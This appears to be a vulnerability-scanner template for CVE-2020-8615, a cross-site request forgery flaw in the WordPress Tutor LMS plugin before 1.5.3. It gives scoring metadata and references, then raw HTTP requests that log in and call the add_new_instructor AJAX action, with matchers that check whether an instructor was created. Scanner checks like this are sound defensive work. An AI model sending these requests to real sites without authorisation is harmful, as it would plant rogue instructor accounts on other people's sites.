id: CVE-2020-8615

info:
  name: Wordpress Plugin Tutor LMS 1.5.3 - Cross-Site Request Forgery
  author: r3Y3r53
  severity: medium
  description: |
    A CSRF vulnerability in the Tutor LMS plugin before 1.5.3 for WordPress can result in an attacker approving themselves as an instructor and performing other malicious actions (such as blocking legitimate instructors).
  remediation: update to v.1.5.3
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2020-8615
    - https://wpscan.com/vulnerability/10058
    - http://packetstormsecurity.com/files/156585/WordPress-Tutor-LMS-1.5.3-Cross-Site-Request-Forgery.html
    - https://wpvulndb.com/vulnerabilities/10058
    - https://www.getastra.com/blog/911/plugin-exploit/cross-site-request-forgery-in-tutor-lms-plugin/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N
    cvss-score: 6.5
    cve-id: CVE-2020-8615
    cwe-id: CWE-352
    epss-score: 0.00479
    epss-percentile: 0.73312
    cpe: cpe:2.3:a:themeum:tutor_lms:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: themeum
    product: tutor_lms
    framework: wordpress
    publicwww-query: /wp-content/plugins/tutor/
  tags: cve,cve2020,wpscan,packetstorm,csrf,wp-plugin,wp,tutor,wordpress,themeum

variables:
  user: "{{rand_base(6)}}"
  pass: "{{rand_base(8)}}"
  email: "{{randstr}}@{{rand_base(5)}}.com"
  firstname: "{{rand_base(5)}}"
  lastname: "{{rand_base(5)}}"

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=add_new_instructor&first_name={{firstname}}&last_name={{lastname}}&user_login={{user}}&email={{email}}&phone_number=1231231231&password={{pass}}&password_confirmation={{pass}}&tutor_profile_bio=Et+tempore+culpa+n&action=tutor_add_instructor

    matchers:
      - type: dsl
        dsl:
          - 'contains(content_type_2, "application/json")'
          - 'contains(body_2, "success") && contains(body_2, "true") && contains(body_2, "Instructor has been added successfully")'
          - 'status_code_2 == 200'
        condition: and
# digest: 4a0a0047304502210096af2d7c1abb887da36f26b6afb1a9e32c585238996090dec1581682338c9b1f022039383951d97b165b2ce9c5aa7ffb1bbd45a2d462d4feea74866ceb07119f0c97:922c64590222798bb761d5b6d8e72950